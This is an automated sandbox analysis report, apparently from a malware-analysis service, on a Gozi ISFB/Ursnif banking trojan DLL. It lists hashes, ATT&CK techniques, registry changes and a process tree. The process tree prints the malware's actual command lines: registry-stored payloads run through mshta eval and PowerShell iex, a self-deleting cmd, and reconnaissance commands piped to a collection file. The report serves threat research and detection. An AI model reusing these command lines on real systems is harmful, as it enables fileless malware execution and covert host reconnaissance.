gozi_ifsb | 84c7bba059b9d495d9e923346510a67a062b20d17c90d806fbf8cb6b67d91363

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7
submitted
27-10-2020 15:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

u271020tar.dll
Size

352KB
MD5

d800d8db5cb2ecc22899dcf7e1c2430d
SHA1

24a64c88075907a3f01bfdc68ef3044c13f25296
SHA256

84c7bba059b9d495d9e923346510a67a062b20d17c90d806fbf8cb6b67d91363
SHA512

39bfb1567d32b177b27627fc76fc5410ebd6009ed972f7b044eae034746311d603ba67b7e1e51d374b34b788a5ccccf7849f2b7169c6184ba180d609cc646aa8

Score

10^/10

gozi_ifsb ursnif banker spyware trojan

Malware Config

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Ursnif, Dreambot
Ursnif is a variant of the Gozi IFSB with more capabilities.
banker trojan ursnif
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1488 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1488	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1824 set thread context of 1216	1824	powershell.exe	Explorer.EXE
PID 1216 set thread context of 1172	1216	Explorer.EXE	iexplore.exe
PID 1216 set thread context of 1488	1216	Explorer.EXE	cmd.exe
PID 1488 set thread context of 964	1488	cmd.exe	PING.EXE
PID 1216 set thread context of 836	1216	Explorer.EXE	cmd.exe

Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

1600 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1436 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1416 systeminfo.exe

pid	process
1600	net.exe

pid	process
1436	tasklist.exe

pid	process
1416	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEmshta.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000099b530accd206940bf4cc3274d3cd5250000000002000000000010660000000100002000000062e1a837521634c74d741219c00a8b64e62e4c10f1302f42f1faacd8974cb7bc000000000e800000000200002000000007d687e2f939ae62319db36bebec5cd1c5bfe9b8a1d46bf163803fe224d7b0cf20000000827904aa5a6bdc8d2b83108ad6fb47053dd6f1778f96ada6815488be49a63b0540000000494405240b6c129a189f0e2cc558dc3b4e2800b5821cd03472d881a92c6bb4f96ff3c3e89156241f5910771390ae7fa9d4627764c76abd9f4250dbdafa1b150e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000099b530accd206940bf4cc3274d3cd525000000000200000000001066000000010000200000007c991bdf8d36648ecbe0ecfbc0abc1fd77a4f6baea19ac030e591564f2ecc0de000000000e8000000002000020000000a7f5461037910eaae4ab8d8c79a585537441141b8ef3c006ac10a6ee861b05ab90000000a5c94ef40f4770fb9df602b3e49484b52e9bd3ad9b2518a9f0942d595096dd5079cf88d28ed45e54a1938483c1158659e4977f9683d1194fc1fb60d65f87ae8d22d7b0fee6be634760cb96276d19889d1aa4331fdec319b3bf384dfd871fccab1bcca8561a2aa97c3ea6c6c712a88434008d1885acfee50f849066c8ab17b2ddc1fefd130c12e87aeeb2fe787869b2f74000000077c1d75b7e1f8e50f4960f26e5f5a34ba3ae7613327b5f9bbfa55dc0d78b5a73bf97e6c81d25b703323951dd21d26639c4a41186df5a077a8d170d078e4fc750	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{498BFDC1-186E-11EB-A2BF-5E3E1FB29FB8} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 402965137bacd601	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4210623931-3856158591-1213714290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

964 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

964 PING.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

rundll32.exepowershell.exeExplorer.EXE

pid process

1540 rundll32.exe
1824 powershell.exe
1824 powershell.exe
1216 Explorer.EXE
Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

1824 powershell.exe
1216 Explorer.EXE
1216 Explorer.EXE
1488 cmd.exe
1216 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exetasklist.exe

description pid process

Token: SeDebugPrivilege 1824 powershell.exe
Token: SeDebugPrivilege 1436 tasklist.exe
Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

1172 iexplore.exe
1172 iexplore.exe
1172 iexplore.exe

pid	process
964	PING.EXE

pid	process
964	PING.EXE

pid	process
1540	rundll32.exe
1824	powershell.exe
1824	powershell.exe
1216	Explorer.EXE

pid	process
1824	powershell.exe
1216	Explorer.EXE
1216	Explorer.EXE
1488	cmd.exe
1216	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeDebugPrivilege	1436	tasklist.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEExplorer.EXE

pid	process
1172	iexplore.exe
1172	iexplore.exe
540	IEXPLORE.EXE
540	IEXPLORE.EXE
1172	iexplore.exe
1172	iexplore.exe
888	IEXPLORE.EXE
888	IEXPLORE.EXE
1172	iexplore.exe
1172	iexplore.exe
540	IEXPLORE.EXE
540	IEXPLORE.EXE
1216	Explorer.EXE

Suspicious use of WriteProcessMemory 133 IoCs

Processes:

rundll32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 788 wrote to memory of 1540	788	rundll32.exe	rundll32.exe
PID 1172 wrote to memory of 540	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 540	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 540	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 540	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 888	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 888	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 888	1172	iexplore.exe	IEXPLORE.EXE
PID 1172 wrote to memory of 888	1172	iexplore.exe	IEXPLORE.EXE
PID 960 wrote to memory of 1824	960	mshta.exe	powershell.exe
PID 960 wrote to memory of 1824	960	mshta.exe	powershell.exe
PID 960 wrote to memory of 1824	960	mshta.exe	powershell.exe
PID 1824 wrote to memory of 1428	1824	powershell.exe	csc.exe
PID 1824 wrote to memory of 1428	1824	powershell.exe	csc.exe
PID 1824 wrote to memory of 1428	1824	powershell.exe	csc.exe
PID 1428 wrote to memory of 1432	1428	csc.exe	cvtres.exe
PID 1428 wrote to memory of 1432	1428	csc.exe	cvtres.exe
PID 1428 wrote to memory of 1432	1428	csc.exe	cvtres.exe
PID 1824 wrote to memory of 1496	1824	powershell.exe	csc.exe
PID 1824 wrote to memory of 1496	1824	powershell.exe	csc.exe
PID 1824 wrote to memory of 1496	1824	powershell.exe	csc.exe
PID 1496 wrote to memory of 1352	1496	csc.exe	cvtres.exe
PID 1496 wrote to memory of 1352	1496	csc.exe	cvtres.exe
PID 1496 wrote to memory of 1352	1496	csc.exe	cvtres.exe
PID 1824 wrote to memory of 1216	1824	powershell.exe	Explorer.EXE
PID 1824 wrote to memory of 1216	1824	powershell.exe	Explorer.EXE
PID 1824 wrote to memory of 1216	1824	powershell.exe	Explorer.EXE
PID 1216 wrote to memory of 1172	1216	Explorer.EXE	iexplore.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1172	1216	Explorer.EXE	iexplore.exe
PID 1216 wrote to memory of 1172	1216	Explorer.EXE	iexplore.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1488	1216	Explorer.EXE	cmd.exe
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1488 wrote to memory of 964	1488	cmd.exe	PING.EXE
PID 1216 wrote to memory of 1072	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1072	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1072	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 680	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 680	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 680	1216	Explorer.EXE	cmd.exe
PID 1072 wrote to memory of 1968	1072	cmd.exe	nslookup.exe
PID 680 wrote to memory of 1628	680	cmd.exe	nslookup.exe
PID 1072 wrote to memory of 1968	1072	cmd.exe	nslookup.exe
PID 1072 wrote to memory of 1968	1072	cmd.exe	nslookup.exe
PID 680 wrote to memory of 1628	680	cmd.exe	nslookup.exe
PID 680 wrote to memory of 1628	680	cmd.exe	nslookup.exe
PID 1216 wrote to memory of 1852	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1852	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1852	1216	Explorer.EXE	cmd.exe
PID 1216 wrote to memory of 1900	1216	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:788
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\u271020tar.dll,#1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1540
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\9CDF174F-4B76-2ED7-B590-AF42B9C45396\\\Dcimsjob'));if(!window.flag)close()</script>"
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\9CDF174F-4B76-2ED7-B590-AF42B9C45396").authspex))
    3⤵
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yua3jone\yua3jone.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1428
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3784.tmp" "c:\Users\Admin\AppData\Local\Temp\yua3jone\CSC6EA912EBAED34121A89BCD37892C87F.TMP"
        5⤵
        
        PID:1432
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jbbbhkiu\jbbbhkiu.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1496
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38AD.tmp" "c:\Users\Admin\AppData\Local\Temp\jbbbhkiu\CSCD153A959C19941B6A7924E651A35D42E.TMP"
        5⤵
        
        PID:1352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\u271020tar.dll"
  2⤵
  - Deletes itself
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:964
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D314.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D3C4.bi1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Windows\system32\nslookup.exe
    nslookup myip.opendns.com resolver1.opendns.com
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D3C4.bi1"
  2⤵
  PID:1852
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D314.bi1"
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1148
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:1416
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:836
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:308
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1820
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:1600
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1552
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1736
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:1472
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:528
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1592
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:792
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:712
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:1440
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1908
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1072
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1852
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\94E0.bin1 > C:\Users\Admin\AppData\Local\Temp\94E0.bin & del C:\Users\Admin\AppData\Local\Temp\94E0.bin1"
  2⤵
  PID:1900
- C:\Windows\system32\makecab.exe
  makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\F5A.bin"
  2⤵
  PID:1788

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1172 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:540
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1172 CREDAT:472079 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:888

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\9sinn1d\imagestore.dat

MD5
a926488137da41ee22131ab76953d4f3

SHA1
55687a8533975b34f5119aa6e5e8a1cb6aeae2b6

SHA256
6275b6151f724056e100cfb926848dc7f40ba0f78edc4301bf2af98940c2a078

SHA512
1e6a3037115850d34bb1a311ffad3a3b0ce88decfc529914643b5b51e91d214834779b8275054f7dd9c91a1d3fdadb9caf44c0ae4f3b28608439f002c9a03460

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HDCN2VQ\favicon[1].ico

MD5
f74755b4757448d71fdcb4650a701816

SHA1
0bcbe73d6a198f6e5ebafa035b734a12809cefa6

SHA256
e78286d0f5dfa2c85615d11845d1b29b0bfec227bc077e74cb1ff98ce8df4c5a

SHA512
e0fb5f740d67366106e80cbf22f1da3cf1d236fe11f469b665236ec8f7c08dea86c21ec8f8e66fc61493d6a8f4785292ce911d38982dbfa7f5f51dadebcc8725

Download Submit
C:\Users\Admin\AppData\Local\Temp\17FE.bin

MD5
2d12e80608da2076ecd31535ada2a71f

SHA1
7d9b8bb073f86b12ff43c521af3acd24d78287af

SHA256
872c11797994159e36fd4e8f6cd43207f7f5867cdc69ec3651d6f823f7029238

SHA512
a81e820ed67a57e9d67d745b465a2ecb3c55b78a8faf50a4896e06d9a065574dac316d03a57422382f45d9e7c60e44605a62fc99f7388bc5330c8a71b184e063

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin

MD5
f51c3911742139ee00e66cc7d514dfd3

SHA1
cb9e1cf862617ec4cfaedab1082ff87a8c5f9686

SHA256
4efba178be3f7269e2833e206668d2b3ddd2b3ef5444beb9af73c2c48f35a725

SHA512
e0546d2b873948599c3203c89813753583967ca26a10610b57489112c41a83100f5bf3e599ff62bb968aff5195337b9db6344fbca0054add6297c61103343ba9

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin

MD5
f51c3911742139ee00e66cc7d514dfd3

SHA1
cb9e1cf862617ec4cfaedab1082ff87a8c5f9686

SHA256
4efba178be3f7269e2833e206668d2b3ddd2b3ef5444beb9af73c2c48f35a725

SHA512
e0546d2b873948599c3203c89813753583967ca26a10610b57489112c41a83100f5bf3e599ff62bb968aff5195337b9db6344fbca0054add6297c61103343ba9

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin1

MD5
34044f040770b79054171563152cb5b9

SHA1
dc4dd6c3456f747be61611933684fbf6e718dcad

SHA256
3222c299794c284bffc3b26bd9344b93bb9d5c5cfc1e7aa4843f0c5334f17ccd

SHA512
d9c4f128f6f98749cbd8d41b46b4611ce95fca95a48b5f9c9ae4b4ee1e1b3a95479ea2a5d5f6b1619cc8a34bcbf5e346125ca19a7351c705d4008933f28b06c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin1

MD5
34044f040770b79054171563152cb5b9

SHA1
dc4dd6c3456f747be61611933684fbf6e718dcad

SHA256
3222c299794c284bffc3b26bd9344b93bb9d5c5cfc1e7aa4843f0c5334f17ccd

SHA512
d9c4f128f6f98749cbd8d41b46b4611ce95fca95a48b5f9c9ae4b4ee1e1b3a95479ea2a5d5f6b1619cc8a34bcbf5e346125ca19a7351c705d4008933f28b06c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin1

MD5
ca96d8aed578ecc25b7c1cd2fc3365b8

SHA1
a6f17ebb04b5cd9faa970be1944c8f0c21c55c95

SHA256
9f6aafbb8083eda67fafd26aa8a17e4e1cbeca6649cb42b0b2367d6131a1dd9d

SHA512
af2935796bfdc9bb7277c141875c1d761fe4b38ef4924da3cf2cfd919507d052031ee7cd759ac9816d9ea082b0666279df58fcde9c6c1e826e8f879fbfb35945

Download Submit
C:\Users\Admin\AppData\Local\Temp\94E0.bin1

MD5
ca96d8aed578ecc25b7c1cd2fc3365b8

SHA1
a6f17ebb04b5cd9faa970be1944c8f0c21c55c95

SHA256
